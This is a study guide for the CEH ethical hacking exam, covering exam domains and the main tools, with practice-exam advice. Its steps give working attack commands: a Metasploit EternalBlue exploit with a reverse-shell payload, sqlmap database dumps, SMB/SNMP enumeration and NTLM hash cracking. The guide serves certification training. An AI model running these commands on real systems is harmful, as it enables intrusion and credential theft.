IntermediateExam Strategy 8 min read

How to Pass the CEH (Certified Ethical Hacker) Exam

Master ethical hacking with real CLI tools and proven exam strategies.

The CEH (Certified Ethical Hacker) exam from EC-Council validates your ability to think like a hacker and identify vulnerabilities before malicious actors do. With 125 multiple-choice questions, a 4-hour time limit, and a passing score of 70%, this exam demands both theoretical knowledge and hands-on proficiency. You'll need to master tools like Nmap, Metasploit, Wireshark, and SQLmap, as well as understand footprinting, scanning, enumeration, system hacking, and social engineering. This guide provides a step-by-step study plan, real CLI commands, and insider tips to help you pass on your first attempt.

1

Understand the Exam Blueprint and Domains

Start by downloading the official CEH exam blueprint from EC-Council. The exam covers 20 domains, including footprinting (17%), scanning networks (17%), enumeration (14%), system hacking (14%), and malware threats (7%). Focus on high-weight domains first. The exam has 125 questions, and you need 70% to pass. Use the blueprint to create a study schedule that allocates more time to domains with higher percentages.

Exam Blueprint Summary
EC-Council CEH Exam Blueprint (v12)
Domain 1: Footprinting & Reconnaissance - 17%
Domain 2: Scanning Networks - 17%
Domain 3: Enumeration - 14%
Domain 4: System Hacking - 14%
Domain 5: Malware Threats - 7%
...
Total Questions: 125
Passing Score: 70%

Print the blueprint and check off each domain as you master it. Use a progress tracker to stay motivated.

Don't skip low-weight domains like IoT hacking (3%) — they can still cost you points.

2

Master Reconnaissance with Nmap and Recon-ng

Footprinting is the first phase of ethical hacking. Practice using Nmap for network scanning and Recon-ng for automated reconnaissance. Learn to identify open ports, running services, and OS fingerprinting. Use Nmap scripts to detect vulnerabilities. For example, run a SYN scan with service version detection and OS detection. Understand the difference between active and passive reconnaissance.

Bash / Recon-ng
nmap -sS -sV -O -T4 -p- 192.168.1.0/24
# SYN scan, version detection, OS detection, all ports

recon-ng
[recon-ng][default] > use recon/domains-hosts/google_site_web
[recon-ng][default] > set SOURCE example.com
[recon-ng][default] > run

Use the Nmap scripting engine (NSE) for vulnerability detection: nmap --script vuln <target>

Always get written permission before scanning any network you don't own.

3

Perform Enumeration with NetBIOS, SNMP, and LDAP

Enumeration extracts user lists, shares, and services from target systems. Use tools like enum4linux for NetBIOS/SMB enumeration, snmpwalk for SNMP, and ldapsearch for Active Directory. Practice extracting usernames, group memberships, and system policies. This phase is critical for identifying attack vectors.

Bash
enum4linux -a 192.168.1.10
# Enumerate users, shares, OS info via SMB

snmpwalk -v2c -c public 192.168.1.10 1.3.6.1.2.1.1
# Enumerate system information via SNMP

ldapsearch -x -H ldap://192.168.1.10 -b "dc=example,dc=com"
# Enumerate LDAP directory

Use the -a flag with enum4linux to get all available information in one go.

SNMP community strings like 'public' are often left default — this is a common exam scenario.

4

Exploit Vulnerabilities with Metasploit and SQLmap

System hacking involves gaining access. Use Metasploit to exploit known vulnerabilities and SQLmap to automate SQL injection attacks. Practice setting up a listener, selecting an exploit, and configuring payloads. For example, exploit EternalBlue on a Windows target or use SQLmap to dump a database. Understand how to escalate privileges and maintain access.

Metasploit / SQLmap
msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.10
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.100
msf6 > exploit

sqlmap -u "http://target.com/page?id=1" --dbs
sqlmap -u "http://target.com/page?id=1" -D database_name --tables
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --dump

Use Metasploit's post-exploitation modules to gather credentials and pivot to other systems.

Metasploit exploits can crash services — test in a lab environment first.

5

Analyze Traffic with Wireshark and Tcpdump

Packet analysis is essential for detecting attacks and understanding network protocols. Use Wireshark to capture and filter traffic. Practice identifying ARP spoofing, SYN floods, and DNS queries. Use tcpdump for command-line packet capture. Learn to filter by IP, port, and protocol. Understand how to extract files from packet captures.

Bash / Wireshark
tcpdump -i eth0 -n -s 0 -w capture.pcap
# Capture all traffic on eth0

tcpdump -r capture.pcap 'tcp port 80'
# Filter HTTP traffic

Wireshark filter: http.request or tcp.port == 443
# Show HTTP requests and HTTPS traffic

Use Wireshark's 'Follow TCP Stream' feature to reconstruct conversations and extract data.

Large packet captures can consume memory — use capture filters to limit scope.

6

Practice Social Engineering and Password Cracking

Social engineering is a key exam domain. Learn techniques like phishing, pretexting, and tailgating. For password cracking, use tools like John the Ripper and Hashcat. Practice cracking NTLM hashes and Linux shadow files. Understand password policies and how to create wordlists with Crunch.

Bash
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# Crack NTLM hashes

hashcat -m 1000 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
# Hashcat mode 1000 = NTLM

crunch 8 8 abcdef123 -o wordlist.txt
# Generate 8-character wordlist with custom charset

Use the rockyou.txt wordlist — it's included in Kali Linux and contains millions of real passwords.

Password cracking can be time-consuming — focus on weak passwords and common patterns.

7

Take Practice Exams and Review Weak Areas

After studying all domains, take full-length practice exams from reputable sources like Boson or EC-Council's official practice tests. Simulate the 4-hour time limit. Review every question you got wrong and understand the reasoning. Focus on areas where you score below 80%. Repeat until you consistently score 85% or higher.

Sample Results
Practice Exam Results:
Domain 1: 85%
Domain 2: 78% <- Weak area, review scanning techniques
Domain 3: 90%
Domain 4: 72% <- Weak area, review privilege escalation
Domain 5: 88%
Overall: 82%

Use the 'exam mode' in practice tests to build stamina and time management skills.

Don't memorize answers — understand the concepts. EC-Council changes questions frequently.

Key tips

  • Set up a home lab with VirtualBox or VMware. Install Kali Linux, Metasploitable, and Windows VMs to practice attacks in a safe environment.

  • Join the CEH subreddit and Discord communities. Discussing concepts with peers reinforces learning and exposes you to real-world scenarios.

  • Use flashcards for port numbers, tool commands, and attack types. Apps like Anki are great for spaced repetition.

  • Focus on the 'why' behind each attack. The exam tests your understanding of methodology, not just tool usage.

  • Take breaks during study sessions. The Pomodoro technique (25 min study, 5 min break) improves retention.

  • Book your exam date before you start studying. A deadline creates urgency and prevents procrastination.

Frequently asked questions

How many questions are on the CEH exam and what is the passing score?

The CEH exam has 125 multiple-choice questions. You have 4 hours to complete it, and the passing score is 70%. Some questions may be unscored (beta questions), but you won't know which ones. Aim for 85% on practice tests to be safe.

Do I need to take an official EC-Council training course to sit for the exam?

EC-Council requires either official training (through an accredited partner) or at least 2 years of information security experience. If you have the experience, you can apply for the exam without training. Otherwise, you must complete a 5-day official CEH course.

What tools should I be proficient in for the CEH exam?

You should be comfortable with Nmap, Wireshark, Metasploit, SQLmap, John the Ripper, Hashcat, Burp Suite, and Recon-ng. The exam tests both theoretical knowledge and practical usage. Practice each tool in a lab environment until you can use them without referring to documentation.

How long does it take to prepare for the CEH exam?

Most candidates need 2-3 months of consistent study, dedicating 10-15 hours per week. If you have prior networking or security experience, you may need less time. Focus on hands-on labs and practice exams rather than just reading books.

Is the CEH exam worth it for my career?

Yes, especially if you're pursuing a career in penetration testing, security analysis, or red teaming. CEH is recognized by the DoD (8570 directive) and many employers. It demonstrates a structured understanding of ethical hacking methodology. However, consider pairing it with OSCP for advanced roles.

Related glossary terms

Browse full glossary →

Practice with real exam questions

Apply what you just learned with exam-style practice questions.

Related guides